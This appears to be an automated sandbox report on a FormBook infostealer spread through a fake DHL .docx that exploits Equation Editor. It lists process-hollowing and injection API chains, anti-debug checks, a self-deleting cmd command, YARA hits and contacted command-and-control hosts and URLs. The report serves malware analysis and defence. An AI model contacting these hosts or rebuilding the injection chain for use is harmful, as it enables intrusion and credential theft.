Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2800	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 2356	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed

Source: explorer.exe, 0000000D.00000000.2119208514.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 0000000D.00000000.2111689374.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000D.00000000.2119208514.0000000004234000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 0000000D.00000000.2111711384.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 9_2_00229B80 rdtsc

9_2_00229B80

Source: C:\Users\Public\vbc.exe

Code function: 11_2_00409B20 LdrLoadDll,

11_2_00409B20

Source: C:\Users\Public\vbc.exe	Code function: 9_2_00220042 push dword ptr fs:[00000030h]	9_2_00220042
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03F28E2B push dword ptr fs:[00000030h]	9_2_03F28E2B
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007426F8 mov eax, dword ptr fs:[00000030h]	11_2_007426F8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020D26F8 mov eax, dword ptr fs:[00000030h]	14_2_020D26F8

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.nevomo.group

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\Public\vbc.exe

Code function: 9_2_00220110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,ExitProcess,

9_2_00220110

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: C90000

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: explorer.exe, 0000000D.00000000.2113569226.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000D.00000000.2113569226.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.2111689374.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.2113569226.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Code function: 9_2_0040B530 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

9_2_0040B530

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection712	Masquerading111	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery221	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer13	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection712	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol122	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information3	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing13	Cached Domain Credentials	System Network Configuration Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Network Connections Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	File and Directory Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery13	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DHL Shipping doc & Shipment tracking details.docx	5%	Virustotal		Browse
DHL Shipping doc & Shipment tracking details.docx	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	100%	Joe Sandbox ML
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	42%	ReversingLabs	Win32.Spyware.Noon
C:\Users\Public\vbc.exe	42%	ReversingLabs	Win32.Spyware.Noon

Unpacked PE Files

Source	Detection	Scanner	Label	Download
14.2.NETSTAT.EXE.2647960.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.vbc.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
11.1.vbc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
14.2.NETSTAT.EXE.2c19a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
www.nevomo.group	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Virustotal		Browse
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Virustotal		Browse
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
www.scott-re.online/nnmd/	100%	Avira URL Cloud	malware
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/	0%	Avira URL Cloud	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.nevomo.group	213.186.33.5	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.scott-re.online/nnmd/	true	Avira URL Cloud: malware	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1	explorer.exe, 0000000D.00000000.2119554654.00000000042CB000.00000004.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.sogou.com/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	explorer.exe, 0000000D.00000000.2134641767.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.msn.com/?ocid=iehps	explorer.exe, 0000000D.00000000.2119187998.0000000004226000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2	explorer.exe, 0000000D.00000000.2130294878.0000000008313000.00000004.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.t-online.de/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 0000000D.00000002.2369452220.0000000000260000.00000004.00000020.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
